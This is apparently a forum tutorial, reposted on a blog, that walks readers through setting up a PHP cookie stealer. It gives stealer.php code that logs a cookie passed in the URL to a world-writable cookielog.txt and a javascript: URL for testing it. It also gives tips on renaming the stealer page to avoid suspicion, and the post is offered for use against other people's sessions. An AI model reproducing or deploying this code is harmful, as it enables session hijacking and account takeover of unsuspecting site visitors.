If you are viewing this topic, you probably are having trouble getting your cookie stealer to work. If you haven't read Freakwolfe's tutorial, read that first.
Now if you've read Freakwolfe's tutorial and still need help, the code isn't the problem.
Quick Notes:
I will not be going over what each part of the code does, Freakwolfe has already done that.
I may edit, add, remove or rephrase as necessary.
I am not responsible for the use of this. Use at your own risk.
If you want your stealer to be more "unnoticable", you might want to change the page from stealer.php to something less suspicious and noticable, such as step2.php or continue.php - just make sure that you change every instance of stealer.php to what you renamed it to.
And the code you put in index.php can be put in any page. Just make sure that all files mentioned are in the same directory.
Javascript is used multiple times. You will need to remove the space between java and script for it to work properly. To notify you of this, there will be Javascript Alert! and Javascript Alert End in sections with the javascript code.
index.php code:
You will need to put the following code somewhere in the document, where you want the cookie stealer link to be:
Javascript Alert!
CODE
Click here!
Javascript Alert End
(You might want to change what the link says... (IMG:style_emoticons/default/wink.gif) )
stealer.php code:
Put this code in the stealer.php file in the directory you wish the cookie stealer to be in. If you already have a page that you want to include the stealer in, put it at the top of the source.
CODE
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
___________
Now you must create a new file: cookielog.txt
Don't worry about changing the name, nobody will know about it, and you won't have to edit the stealer.php code.
Now if you want your cookie stealer to work, make sure you CHMOD your cookielog.txt file to 777 or drwxrwxrwx
That will allow the cookie stealer to write to the file so that you can capture the information.
You know should have your cookie stealer successfully set up.
Testing It Out
1. To test out your cookie stealer, open a new tab or window (so that you can follow this).
2. Type (or copey & paste) the following into the URL in that new tab or window, not the current one (i.e. the one you are reading this in) and press enter:
Javascript Alert!
CODE
java script:void(document.cookie="test=working");alert(document.cookie);
Javascript Alert End
Once you press enter, you should see an alert box that says "test=working" without quotes.
3. Now go to your site where the link is in the tab or window you entered the javascript injection (the code directly above in step 2) in.
4. Click the link. If you are brought to a blank page, that is good.
5. Download and open, or view your cookielog.txt file. You should have a line of text that says "testing=working" without quotes. If so, your cookie stealer is working! Congratz!
Common mistakes:
Forgetting to create cookielog.txt
Forgetting to change the permissions of the file to 777 (CHMOD)
Forgetting to remove the space in javascript - a space is added for security reasons in posts on this site.
_____________________________________________________
If you are still having trouble, I have created a video.
The video is located at this link. There is a link on that page (you can't miss it) to download the zip folder.
To watch the video:
Download the folder.
Extract it.
There will be one file: cookie.avi
Open cookie.avi in Windows Media Player.
Watch the video.
Some side notes:
My OS is not Vista. It's XP. I used a Vista Transformation Pack that I found on PCWorld for free to make it look and feel like Vista, without the hassles of Vista. You get the good of Vista with the good of XP.
I used CamStudio to make the video. CamStudio is freeware.
Sorry for the crappy quality - I had to make it a REALLY small file size by lowering the quality to 45% - enough to read the text but small enough to be less than 5 mb when compressed.
If you have any questions about the video, feel free to ask me or send me a PM.
_____________________________________________________
Mods, if you feel anything should be added, changed, or removed, please pm me or do it yourself.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment